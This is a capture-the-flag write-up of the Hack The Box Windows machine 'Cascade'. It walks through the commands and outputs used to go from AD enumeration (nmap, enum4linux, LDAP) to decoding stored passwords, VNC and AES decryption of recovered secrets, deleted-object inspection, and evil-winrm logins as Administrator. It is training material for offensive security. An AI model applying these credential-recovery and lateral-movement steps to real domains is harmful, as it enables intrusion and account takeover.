Cascade HTB

Hello,

This is my write-up for Cascade box, which was a windows box. I had some difficulties with this since I am not that good with windows but I learned new things. Let’s dive into it.

First of all I scan for available ports using the following nmap command.

nmap -sC -sV -oA initial -Pn 10.10.10.182

I get the following result:

PORT      STATE SERVICE       VERSION                                                                                                                                                                                                      
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)                                                                                                                                               
| dns-nsid:                                                                                                                                                                                                                                
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)                                                                                                                                                                                        
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-04-01 15:35:14Z)                                                                                                                                               
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                                                                                                                        
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                                                                                                
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)                                                                                                               
445/tcp   open  microsoft-ds?                                                                                                                                                                                                              
636/tcp   open  tcpwrapped                                                                                                                                                                                                                 
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)                                                                                                               
3269/tcp  open  tcpwrapped                                                                                                                                                                                                                 
49154/tcp open  msrpc         Microsoft Windows RPC                                                                  
49155/tcp open  msrpc         Microsoft Windows RPC                                                                  
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                                    
49158/tcp open  msrpc         Microsoft Windows RPC                                                                  
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows                                                                                                                      
                                                                                                                     
Host script results:                                                                                                                                                                                                                       
|_clock-skew: -1s                                                                                                    
| smb2-security-mode:                                                                                                
|   2.02:                                                                                                            
|_    Message signing enabled and required                                                                           
| smb2-time:                                                                                                         
|   date: 2020-04-01T15:36:03                                                                                        
|_  start_date: 2020-04-01T14:37:26                                                                                  

We have few services which are relatable to active directory such as kerberos, ldap, smb. First I will use enum4linux to get possible username and group, which information accessible from ldap.

enum4linux -a 10.10.10.182

Users:
Group 'Domain Users' (RID: 513) has member: CASCADE\administrator
Group 'Domain Users' (RID: 513) has member: CASCADE\krbtgt
Group 'Domain Users' (RID: 513) has member: CASCADE\arksvc 
Group 'Domain Users' (RID: 513) has member: CASCADE\s.smith
Group 'Domain Users' (RID: 513) has member: CASCADE\r.thompson
Group 'Domain Users' (RID: 513) has member: CASCADE\util
Group 'Domain Users' (RID: 513) has member: CASCADE\j.wakefield
Group 'Domain Users' (RID: 513) has member: CASCADE\s.hickson
Group 'Domain Users' (RID: 513) has member: CASCADE\j.goodhand
Group 'Domain Users' (RID: 513) has member: CASCADE\a.turnbull
Group 'Domain Users' (RID: 513) has member: CASCADE\e.crowe
Group 'Domain Users' (RID: 513) has member: CASCADE\b.hanson
Group 'Domain Users' (RID: 513) has member: CASCADE\d.burman
Group 'Domain Users' (RID: 513) has member: CASCADE\BackupSvc
Group 'Domain Users' (RID: 513) has member: CASCADE\j.allen
Group 'Domain Users' (RID: 513) has member: CASCADE\i.croft

Groups:
group:[Cert Publishers] rid:[0x205]                                                                                  
group:[RAS and IAS Servers] rid:[0x229]                                                                              
group:[Allowed RODC Password Replication Group] rid:[0x23b]                                                          
group:[Denied RODC Password Replication Group] rid:[0x23c]                                                           
group:[DnsAdmins] rid:[0x44e]                                                                                        
group:[IT] rid:[0x459]                                                                                               
group:[Production] rid:[0x45a]                                                                                       
group:[HR] rid:[0x45b]                                                                                               
group:[AD Recycle Bin] rid:[0x45f]                                                                                   
group:[Backup] rid:[0x460]                                                                                           
group:[Temps] rid:[0x463]                                                                                            
group:[WinRMRemoteWMIUsers__] rid:[0x465]                                                                            
group:[Remote Management Users] rid:[0x466]                                                                          
group:[Factory] rid:[0x46c]                                                                                          
group:[Finance] rid:[0x46d]                                                                                          
group:[Audit Share] rid:[0x471]                                                                                      
group:[Data Share] rid:[0x472]  

I have a list of usernames and a list of groups. I will try with each one of these username to do a null authentication on smb port 445. But that was not the case. At this point I install and open a gui tool called jxplorer. With this tool I can inspect ldap easily. I enter the host ip and then try to find juicy info on users attributes. r_thompson_password_base64

User r.thompson has a attribute named CascadeLegacyPwd, and I can tell it is base64 because I see a =. I get the password for that user.

echo -n "clk0bjVldmE=" | base64 -d
rY4n5eva

Let’s use smbclient with the username and password we have, to test if we can login to smb …..

smbclient -L //10.10.10.182 -U r.thompson
Enter WORKGROUP\r.thompson's password: rY4n5eva

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Audit$          Disk      
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

I try to access Audit$ but I don’t have permission to do, and then I try Data:

kali@kali:~/Desktop/Boxes/Cascade/Nmap$ smbclient  //10.10.10.182/Audit$ -U r.thompson
Enter WORKGROUP\r.thompson's password: 
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
kali@kali:~/Desktop/Boxes/Cascade/Nmap$ smbclient  //10.10.10.182/Data -U r.thompson
Enter WORKGROUP\r.thompson's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 22:27:34 2020
  ..                                  D        0  Sun Jan 26 22:27:34 2020
  Contractors                         D        0  Sun Jan 12 20:45:11 2020
  Finance                             D        0  Sun Jan 12 20:45:06 2020
  IT                                  D        0  Tue Jan 28 13:04:51 2020
  Production                          D        0  Sun Jan 12 20:45:18 2020
  Temps                               D        0  Sun Jan 12 20:45:15 2020

                13106687 blocks of size 4096. 7797938 blocks available
smb: \> 

I was able to get these files from the share.

kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ ls
 ArkAdRecycleBin.log   dcdiag.log   Meeting_Notes_June_2018.html  'VNC Install.reg'
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ 

The file ArkAdRecycleBin.log contains logs from a program called Ark Ad recycle bin. ark If you look closely you can see 2 objects get deleted. And the command is running as user ArkSvc. Maybe we can restore these objects?

The file dcdiag.log has inside: dcdiag

Which as the header says is something related to Server diagnosis. But there was nothing I could take as good info from this file.

The other file Meeting_Notes_June_2018.html: meeting_notes

From this file I get the following info:

If you look at the ArkAdRecycleBin file we can see user TempAdmin get deleted and the date is 8/12/2018 which is the day after wednesday. We keep this in our mind.

The last file we see it VNC Install.reg:

vnc_log
This is extracted from a registry as the file extension says. Also there is Password which is in hex. I try and search more in depth for this and find out a tool which may decode the password for me. I used this tool vncpasswd.

kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ git clone https://github.com/trinitronx/vncpasswd.py.git vncpasswd.py
Cloning into 'vncpasswd.py'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (22/22), done.
remote: Total 287 (delta 10), reused 13 (delta 4), pack-reused 261
Receiving objects: 100% (287/287), 87.94 KiB | 526.00 KiB/s, done.
Resolving deltas: 100% (144/144), done.
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ cd vncpasswd.py
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ ./vncpasswd.py -d -H "6bcf2a4b6e5aca0f"
Cannot read from Windows Registry on a Linux system
Cannot write to Windows Registry on a Linux system
Decrypted Bin Pass= 'sT333ve2'
Decrypted Hex Pass= '7354333333766532'
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ 

And get the password sT333ve2 . At this point I nmap again to check if winrm is open.

kali@kali:~$ nmap -Pn -p 5985,5986 10.10.10.182
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 19:27 EDT
Nmap scan report for 10.10.10.182
Host is up (0.069s latency).

PORT     STATE    SERVICE
5985/tcp open     wsman
5986/tcp filtered wsmans

Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds
kali@kali:~$ 

I first try with user s.smith(name taken from enum4linux output) as this user was also seen in the Meeting_Notes_June_2018.html file.

kali@kali:~$ evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami
cascade\s.smith

I am logged in as s.smith now and I can read the user.txt file also. After poking around the box I can’t seem to find much. So I go back, and try to see if I can access the smb share with the credentials of the new user…

smbclient  //10.10.10.182/Audit$ -U s.smith
Enter WORKGROUP\s.smith's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 29 13:01:26 2020
  ..                                  D        0  Wed Jan 29 13:01:26 2020
  CascAudit.exe                       A    13312  Tue Jan 28 16:46:51 2020
  CascCrypto.dll                      A    12288  Wed Jan 29 13:00:20 2020
  DB                                  D        0  Tue Jan 28 16:40:59 2020
  RunAudit.bat                        A       45  Tue Jan 28 18:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 02:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 02:38:38 2019
  x64                                 D        0  Sun Jan 26 17:25:27 2020
  x86                                 D        0  Sun Jan 26 17:25:27 2020

                13106687 blocks of size 4096. 7796325 blocks available
smb: \> 

I can access audit which contains a .exe with a dll which seems to be linked to it A DB folder and some others .ddl files. Inside DB there is a file named Audit.db.

kali@kali:~/Desktop/Boxes/Cascade/smbshare/$ file Audit.db 
Audit.db: SQLite 3.x database, last written using SQLite version  

I open the file with SQlite database browser. I find inside the Ldap Table a base64 string. I try to decode it bu nothing. This seems to belong to a user named ArkSvc. This user maybe is related to ArkAdRecycleBin as seen on the log. arksvc

By looking into the RunAudit.bat I see there is something related to the executable file.

kali@kali:~/Desktop/Boxes/Cascade/smbshare/$ cat RunAudit.bat 
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"

Maybe the password is encrypted by using the exe file we saw earlier. I am going to use AvaloniaILSpy you can also use dotPeek if you feel like switching to a windows box. I open the executable file and try to find the main function. Because this is the function every program starts. In the main program I find some juicy staff. ILSPY There is some decryption proccess happening on password = Crypto.DecryptString(encryptedString, "c4scadek3y654321"); I also found a string there. Now I am going to load the dll file to see if I found something there also, as the Crypto.DecryptString may be reffering to the dll. I find the decryption Function inside the dll decryption_function There is also a IV key and the decryption algorithm which seems to be AES in CBC mode.

I now have the following extracted:

By using this website, I get the decrypted password in base64 encoding.

kali@kali:~$ echo -n "dzNsYzBtZUZyMzFuZA==" | base64 -d
w3lc0meFr31nd

I now login as the user ArkSvc and password w3lc0meFr31nd with evil-winrm. Now as the file ArkAdRecycleBin.log shows I will try to restore the deleted accounts, because these are on recyclebin right???…

I see the deleted objects:

get-adobject -filter 'objectclass -eq "user" -AND IsDeleted -eq $True' -IncludeDeletedObjects -properties IsDeleted,LastKnownParent | Format-List Name,IsDeleted,LastKnownParent,DistinguishedName

deleted_object But trying to restore it does not gives me the rights to do it.

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject
Insufficient access rights to perform the operation
At line:1 char:80
+ ... ccountName -eq 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject
+                                                          ~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (CN=TempAdmin\0A...ascade,DC=local:ADObject) [Restore-ADObject], ADException
    + FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject
*Evil-WinRM* PS C:\Users\arksvc\Documents> 

After a little bit, I try and see if I can see the properties of this object, which may throw us the password as the r.thompson user did.

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects -Properties *


accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : TempAdmin@cascade.local
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

Indeed it did throw us the password:

cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
which when I base64 decode it gives me the cleartext password:
baCT3r1aN00dles

I now use again evil-winrm but this time as user Administrator(Because as seen in the file Meeting_Notes_June_2018.html the TempAdmin has the same password as the admin).

kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

I can obtain root.txt now.

Extra

Trying to log in as TempAdmin does not do something as this users is deleted. I restore the object with the command Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject as user administrator and then try to login but I can’t do it. By viewing the in which Groups TempAdmin the user is not inside Remote Management user. By adding the user at that group I can login also as TempAdmin

kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> net user TempAdmin
User name                    TempAdmin
Full Name                    TempAdmin
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            27/01/2020 04:23:08
Password expires             Never
Password changeable          27/01/2020 04:23:08
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\Administrator\Documents> Add-LocalGroupMember -Group "Remote Management Users" -Member "TempAdmin"
*Evil-WinRM* PS C:\Users\Administrator\Documents> exit
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ evil-winrm -i 10.10.10.182 -u TempAdmin -p baCT3r1aN00dles
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\TempAdmin\Documents> whoami
cascade\tempadmin

Here are some useful links while doing this box. Active-directory-recycle-bin

The quieter you become, the more you are able to hear.
DHT4tMDxN34WgmtcX9em8AGMeqMpSechq4